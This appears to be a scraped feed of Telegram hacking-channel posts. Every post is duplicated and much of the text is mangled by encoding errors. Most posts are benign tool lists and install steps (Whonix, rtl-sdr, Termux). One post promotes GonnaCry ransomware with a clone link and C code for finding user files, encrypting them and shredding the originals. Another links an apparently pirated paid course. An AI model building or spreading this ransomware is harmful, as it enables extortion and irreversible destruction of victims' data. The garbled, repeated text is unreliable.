5οΈβ£How to install Whonix ?
The file will be downloaded with the extension .ova of the form Whonix-XFCE - *. Ova . Run it with a double click - if you already have VirtualBox installed, this file will automatically open in it.
Just click the " Import " button
6οΈβ£What is Whonix-Gateway and Whonix-Workstation ?
1) Whonix-Gateway is a gateway. It is a specially configured Linux d>stribution that runs Tor, but cannot run applications. Purpose - to provide Internet access for Whonix-Workstation , that is, to be a gateway. Whonix-Workstation can work without Whonix-Gateway, but the workstation will not have Internet access.
2) Whonix-Workstation is a complete Linux operating system that can run applications. This OS also has special Internet settings - access to the global network is possible only through the Whonix-Gateway .
3) The settings of the Whonix-Gateway virtual machine can be left by default, since it is not very resource -intensive, and you can add resources to the Whonix-Workstation , in particular, RAM. To do this, right-click on Whonix-Workstation and click " Configure ".
4) Go to the " System " tab and increase the size of the " Main memory
]
The file will be downloaded with the extension .ova of the form Whonix-XFCE - *. Ova . Run it with a double click - if you already have VirtualBox installed, this file will automatically open in it.
Just click the " Import " button
6οΈβ£What is Whonix-Gateway and Whonix-Workstation ?
1) Whonix-Gateway is a gateway. It is a specially configured Linux d>stribution that runs Tor, but cannot run applications. Purpose - to provide Internet access for Whonix-Workstation , that is, to be a gateway. Whonix-Workstation can work without Whonix-Gateway, but the workstation will not have Internet access.
2) Whonix-Workstation is a complete Linux operating system that can run applications. This OS also has special Internet settings - access to the global network is possible only through the Whonix-Gateway .
3) The settings of the Whonix-Gateway virtual machine can be left by default, since it is not very resource -intensive, and you can add resources to the Whonix-Workstation , in particular, RAM. To do this, right-click on Whonix-Workstation and click " Configure ".
4) Go to the " System " tab and increase the size of the " Main memory
]
8οΈβ£How to check the reliability of Whonix "
> You can check your system for the disclosure of the real IP address, as well as for various types of leaks (for example, DNS leaks), for this we have compiled a list of " Services for finding IP address leaks ".
9οΈβ£ How to update programs in Whonix
To update all packages in the system, programs and the OS itself, run the command:
> sudo apt update && sudo apt dist-upgrade
πIt needs to be done from time to time in both the Whonix-Gateway and Whonix-Workstation.
> Updates, in addition to fixing bugs and adding new functions, may close identified vulnerabilities.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
> You can check your system for the disclosure of the real IP address, as well as for various types of leaks (for example, DNS leaks), for this we have compiled a list of " Services for finding IP address leaks ".
9οΈβ£ How to update programs in Whonix
To update all packages in the system, programs and the OS itself, run the command:
> sudo apt update && sudo apt dist-upgrade
πIt needs to be done from time to time in both the Whonix-Gateway and Whonix-Workstation.
> Updates, in addition to fixing bugs and adding new functions, may close identified vulnerabilities.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST VOICE CHANGER APPS FOR ANDROID :
1) https://play.google.com/store/apps/details?id=com.androidrocker.voicechanger
2) https://play.google.com/store/apps/details?id=com.baviux.voicechanger
3) https://apkpure.com/voice-changer-with-effects/com.baviux.voicechanger
4) https://apkpure.com/voice-changer/com.androidrocker.voicechanger
5) https://apkpure.com/best-voice-changer/com.scoompa.voicechanger
6) https://apkpure.com/voice-changer/com.e3games.voicechanger
enjoyβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST VOICE CHANGER APPS FOR ANDROID :
1) https://play.google.com/store/apps/details?id=com.androidrocker.voicechanger
2) https://play.google.com/store/apps/details?id=com.baviux.voicechanger
3) https://apkpure.com/voice-changer-with-effects/com.baviux.voicechanger
4) https://apkpure.com/voice-changer/com.androidrocker.voicechanger
5) https://apkpure.com/best-voice-changer/com.scoompa.voicechanger
6) https://apkpure.com/voice-changer/com.e3games.voicechanger
enjoyβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Voice Changer - Apps on Google Play
Get robotic, alien, chipmunk, duck and other funny effects for your voice!
Forwarded from Backup Legal Mega
π¦2020 full Udacity Artificial Intelligence for Trading-5 , 9 Gbβ
> https://www.udacity.com/course/ai-for-trading--nd880
https://mega.nz/folder/35UDQCob#t8UP2uLoZf5KNVIdqYHu3w
> https://www.udacity.com/course/ai-for-trading--nd880
https://mega.nz/folder/35UDQCob#t8UP2uLoZf5KNVIdqYHu3w
Udacity
AI Trading Strategies | Online Course | Udacity
Learn to build AI-based trading models covering ideation, preprocessing, model development, backtesting, and optimization. Enroll today.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ frequency scanning GUI for the OsmoSDR rtl-sdr library :
WORKING ON :
-Windows 7 (x86 and x64)
-Windows 8.1 (x64)
-Ubuntu 12.04 (x86)
-Ubuntu 12.10 (x64)
-Ubuntu 13.04 (x64)
-Ubuntu 14.04 (x64)
-OS X Snow Leopard
-OS X Mountain Lion
-Termux(root + requirements)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£UBUNTU :
1) Press CTRLALTT to open a command window and run the following command to install the libraries:
2)sudo apt-get install python python-wxgtk3.0 rtl-sdr
3)Install the software using:
4) sudo pip install -U rtlsdrscanner
Now you should be able to run the program:
5) python -m rtlsdrscanner
2οΈβ£FEDORA :
From the GNOME desktop start a new terminal. Type the following to install the libraries:
1) sudo dnf install python-matplotlib-wx rtl-sdr
Install the software using:
2) sudo pip install -U rtlsdrscanner
Now you should be able to run the program:
3)python -m rtlsdrscanner
3οΈβ£Arch Linux
From the GNOME desktop start a new terminal. Type the following to install the dependencies:
1) sudo pacman -S python2-matplotlib rtl-sdr
The install the application:
2) sudo pip install -U rtlsdrscanner
Now you should be able to run the program:
3) python -m rtlsdrscanner
4οΈβ£FOR WINDOWS :
https://eartoearoak.com/taxonomy/term/12
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ frequency scanning GUI for the OsmoSDR rtl-sdr library :
WORKING ON :
-Windows 7 (x86 and x64)
-Windows 8.1 (x64)
-Ubuntu 12.04 (x86)
-Ubuntu 12.10 (x64)
-Ubuntu 13.04 (x64)
-Ubuntu 14.04 (x64)
-OS X Snow Leopard
-OS X Mountain Lion
-Termux(root + requirements)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£UBUNTU :
1) Press CTRLALTT to open a command window and run the following command to install the libraries:
2)sudo apt-get install python python-wxgtk3.0 rtl-sdr
3)Install the software using:
4) sudo pip install -U rtlsdrscanner
Now you should be able to run the program:
5) python -m rtlsdrscanner
2οΈβ£FEDORA :
From the GNOME desktop start a new terminal. Type the following to install the libraries:
1) sudo dnf install python-matplotlib-wx rtl-sdr
Install the software using:
2) sudo pip install -U rtlsdrscanner
Now you should be able to run the program:
3)python -m rtlsdrscanner
3οΈβ£Arch Linux
From the GNOME desktop start a new terminal. Type the following to install the dependencies:
1) sudo pacman -S python2-matplotlib rtl-sdr
The install the application:
2) sudo pip install -U rtlsdrscanner
Now you should be able to run the program:
3) python -m rtlsdrscanner
4οΈβ£FOR WINDOWS :
https://eartoearoak.com/taxonomy/term/12
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Debugging Punycode-IDN tutorials & tools
#resources
>Remove hostnames larger than 63 characters (RFC 1035)
> other characters inadmissible by IDN
> convert domains with international characters (not ASCII) and used for homologous attacks to Punycode/IDNA format /
> https://docs.oracle.com/javase/tutorial/i18n/network/idn.html
>https://blog.arvixe.com/using-idn-conversion-tool-in-websitepanel/
> https://www.systutorials.com/docs/linux/man/1-idn/
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Debugging Punycode-IDN tutorials & tools
#resources
>Remove hostnames larger than 63 characters (RFC 1035)
> other characters inadmissible by IDN
> convert domains with international characters (not ASCII) and used for homologous attacks to Punycode/IDNA format /
> https://docs.oracle.com/javase/tutorial/i18n/network/idn.html
>https://blog.arvixe.com/using-idn-conversion-tool-in-websitepanel/
> https://www.systutorials.com/docs/linux/man/1-idn/
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.gnu.org
10 Invoking idn
Next: Emacs API, Previous: Examples, Up: Top [Contents][Index]
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top rated 2020 drivers updaters for windows :
>https://www.iobit.com/en/driver-booster.php
> https://drp.su/en
> https://www.snappy-driver-installer.org/
> https://www.drivethelife.com/free-drivers-download-utility.html
> https://www.driverscloud.com/en/start
> https://www.driveridentifier.com/download.php
> http://freedriverscout.com/startdownload/index.html
> https://www.drivereasy.com/
> http://devicedoctor.com/device-doctor-builds.php
> https://www.drvhub.net/
> https://www.drivermax.com/download.htm
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top rated 2020 drivers updaters for windows :
>https://www.iobit.com/en/driver-booster.php
> https://drp.su/en
> https://www.snappy-driver-installer.org/
> https://www.drivethelife.com/free-drivers-download-utility.html
> https://www.driverscloud.com/en/start
> https://www.driveridentifier.com/download.php
> http://freedriverscout.com/startdownload/index.html
> https://www.drivereasy.com/
> http://devicedoctor.com/device-doctor-builds.php
> https://www.drvhub.net/
> https://www.drivermax.com/download.htm
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Iobit
Driver Booster 13 Free: Official Free Driver Updater Tool for Windows 2025
The best free driver updater for Windows 11/10. Fully detect and update all your old drivers for graphics, USB, audio, display, network, printer, mouse, keyboard and scanner. Free check driver updates now.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Active Blocklists :
- 280blocker
- ABPindo indonesianadblockrules
- Adaway
- adblockplus malwaredomains_full
- Anti-WebMiner
- anudeepND Blocklist (included: coinminer, adservers)
- BambenekConsulting
- betterwebleon dga-feed
- BlackJack8 iOSAdblockList (included: iOSAdblockList and Scam Websites, Crypto Miners and Fake new)
- Capitole - Direction du SystΓΒ¨me d'Information (DSI)
- Carl Spam
- cedia.org.ec (included: domains, immortal_domains)
- chadmayfield (included: porn_all, porn top)
- Cibercrime-Tracker
- cobaltdisco Google-Chinese-Results-Blocklist
- crazy-max WindowsSpyBlocker
- Dawsey21 List
- Disconnect.me (included: simple_ad, simple_malvertising, simple_tracking)
- dshield.org (included: Low, Medium, High)
- ethanr dns-blacklists
- firebog.net (included: AdguardDNS, Airelle-hrsk, Airelle-trc, BillStearns, Easylist, Easyprivacy, Kowabit, Prigent-Ads, Prigent-Malware, Prigent-Phishing, Shalla-mal, WaLLy3K)
- gfmaster adblock-korea
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Active Blocklists :
- 280blocker
- ABPindo indonesianadblockrules
- Adaway
- adblockplus malwaredomains_full
- Anti-WebMiner
- anudeepND Blocklist (included: coinminer, adservers)
- BambenekConsulting
- betterwebleon dga-feed
- BlackJack8 iOSAdblockList (included: iOSAdblockList and Scam Websites, Crypto Miners and Fake new)
- Capitole - Direction du SystΓΒ¨me d'Information (DSI)
- Carl Spam
- cedia.org.ec (included: domains, immortal_domains)
- chadmayfield (included: porn_all, porn top)
- Cibercrime-Tracker
- cobaltdisco Google-Chinese-Results-Blocklist
- crazy-max WindowsSpyBlocker
- Dawsey21 List
- Disconnect.me (included: simple_ad, simple_malvertising, simple_tracking)
- dshield.org (included: Low, Medium, High)
- ethanr dns-blacklists
- firebog.net (included: AdguardDNS, Airelle-hrsk, Airelle-trc, BillStearns, Easylist, Easyprivacy, Kowabit, Prigent-Ads, Prigent-Malware, Prigent-Phishing, Shalla-mal, WaLLy3K)
- gfmaster adblock-korea
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Inactive Blocklists :
- CHEF-KOCH BarbBlock-filter-list
- hosts-file.net (included: ad_servers, emd, grm, hosts, psh)
- margevicius easylistlithuania
- Passwall SpamAssassin
- squidblacklist.org (included: dg-ads, dg-malicious.acl)
- UrlBlacklist
β git 2020
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Inactive Blocklists :
- CHEF-KOCH BarbBlock-filter-list
- hosts-file.net (included: ad_servers, emd, grm, hosts, psh)
- margevicius easylistlithuania
- Passwall SpamAssassin
- squidblacklist.org (included: dg-ads, dg-malicious.acl)
- UrlBlacklist
β git 2020
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE COMMUNITY
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 ransomware :
> A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:
π¦FEATURES
>encrypt all user files with AES-256-CBC.
>Random AES key and IV for each file.
>Works even without internet connection.
>Communication with the server to decrypt Client-private-key.
>encrypt AES key with client-public-key RSA-2048.
>encrypt client-private-key with RSA-2048 server-public-key.
>Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
>Decryptor that communicate to server to send keys.
>python webserver
>Daemon
>Kill databases
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£DOWNLOAD OR CLONE https://github.com/tarcisio-marinho/GonnaCry
2οΈβ£go dir then
3οΈβ£First the ransomware needs to know some pathβs, such as the desktop directory path, trash, home, etcβ¦
To get the user and home directory i will use some glibc librarys from unistd.h 12
char * home = get_home_enviroment(); // /home/USER/
char * desktop = get_desktop_enviroment(home); // /home/USER/Desktop/
char * username = get_username(); USERNAME
char * trash = get_trash_path(home); // /home/USER/.local/share/Trash/
char * media = get_media_path(username);
With the paths we can enter in each folder, find files inside it, create new files, whatever we want.
> First part - Finding the files
4οΈβ£For each file in the list, he will try to open and create a new file.
old = fopen(files->info[2], "rb");
if(old != NULL){
new_name = (char*) malloc(sizeof(char) * (strlen(files->info[2]) + 11));
strcpy(new_name, files->info[2]);
strcat(new_name, ".GNNCRY");
new = fopen(new_name, "wb");
5οΈβ£Generate a unique random key and IV for each file and call encrypt function(I let you guess what it does :slight_smile:).
6οΈβ£After the encryption, now we need to shred the old file, to never come back.
7οΈβ£Now the old file bytes are overwritten with zeros, and then deleted.
Even with some recovery tool software, the original file is lost.
goto Second part - Start Encryption; //This repeats for each file on the linked list.
Third part - create Desktop file: enc_files.gc
This file will help the decryptor to get the path, key and iv used to encrypt each file.
First field is the random Key, then the random IV and the file path.
π¦VIDEO TUTORIAL : https://youtu.be/pLluFxHrc30
ENJOYβ€οΈππ»
β 2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 ransomware :
> A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:
π¦FEATURES
>encrypt all user files with AES-256-CBC.
>Random AES key and IV for each file.
>Works even without internet connection.
>Communication with the server to decrypt Client-private-key.
>encrypt AES key with client-public-key RSA-2048.
>encrypt client-private-key with RSA-2048 server-public-key.
>Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
>Decryptor that communicate to server to send keys.
>python webserver
>Daemon
>Kill databases
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£DOWNLOAD OR CLONE https://github.com/tarcisio-marinho/GonnaCry
2οΈβ£go dir then
3οΈβ£First the ransomware needs to know some pathβs, such as the desktop directory path, trash, home, etcβ¦
To get the user and home directory i will use some glibc librarys from unistd.h 12
char * home = get_home_enviroment(); // /home/USER/
char * desktop = get_desktop_enviroment(home); // /home/USER/Desktop/
char * username = get_username(); USERNAME
char * trash = get_trash_path(home); // /home/USER/.local/share/Trash/
char * media = get_media_path(username);
With the paths we can enter in each folder, find files inside it, create new files, whatever we want.
> First part - Finding the files
4οΈβ£For each file in the list, he will try to open and create a new file.
old = fopen(files->info[2], "rb");
if(old != NULL){
new_name = (char*) malloc(sizeof(char) * (strlen(files->info[2]) + 11));
strcpy(new_name, files->info[2]);
strcat(new_name, ".GNNCRY");
new = fopen(new_name, "wb");
5οΈβ£Generate a unique random key and IV for each file and call encrypt function(I let you guess what it does :slight_smile:).
6οΈβ£After the encryption, now we need to shred the old file, to never come back.
7οΈβ£Now the old file bytes are overwritten with zeros, and then deleted.
Even with some recovery tool software, the original file is lost.
goto Second part - Start Encryption; //This repeats for each file on the linked list.
Third part - create Desktop file: enc_files.gc
This file will help the decryptor to get the path, key and iv used to encrypt each file.
First field is the random Key, then the random IV and the file path.
π¦VIDEO TUTORIAL : https://youtu.be/pLluFxHrc30
ENJOYβ€οΈππ»
β 2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - tarcisio-marinho/GonnaCry: A Linux Ransomware
A Linux Ransomware. Contribute to tarcisio-marinho/GonnaCry development by creating an account on GitHub.
WPA+WPA2-ENTERPRISE Best Practice Guide.pdf
36 KB
WPA+WPA2-ENTERPRISE Best Practice Guide #requested :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FOR BEGINERS INSTALL UBUNTU 2020 ON ANDROID :
(TERMUX)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg install proot wget
2) mkdir -p ~/jails/ubuntu
3) cd ~/jails/ubuntu
4)wget https://raw.githubusercontent.com/Neo-Oli/termux-ubuntu/master/ubuntu.sh
5) bash ubuntu.sh
6) bash jails/ubuntu/start-ubuntu.sh
7) unminimize
8) apt install git net-tools curl
ENJOYβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FOR BEGINERS INSTALL UBUNTU 2020 ON ANDROID :
(TERMUX)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg install proot wget
2) mkdir -p ~/jails/ubuntu
3) cd ~/jails/ubuntu
4)wget https://raw.githubusercontent.com/Neo-Oli/termux-ubuntu/master/ubuntu.sh
5) bash ubuntu.sh
6) bash jails/ubuntu/start-ubuntu.sh
7) unminimize
8) apt install git net-tools curl
ENJOYβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
NEW UPDATE LAZYMUX 2020 TERMUX :
1-apt install python git
2-git clone https://github.com/Gameye98/Lazymux
3-cd Lazymux
4-python lazymux.py
1-apt install python git
2-git clone https://github.com/Gameye98/Lazymux
3-cd Lazymux
4-python lazymux.py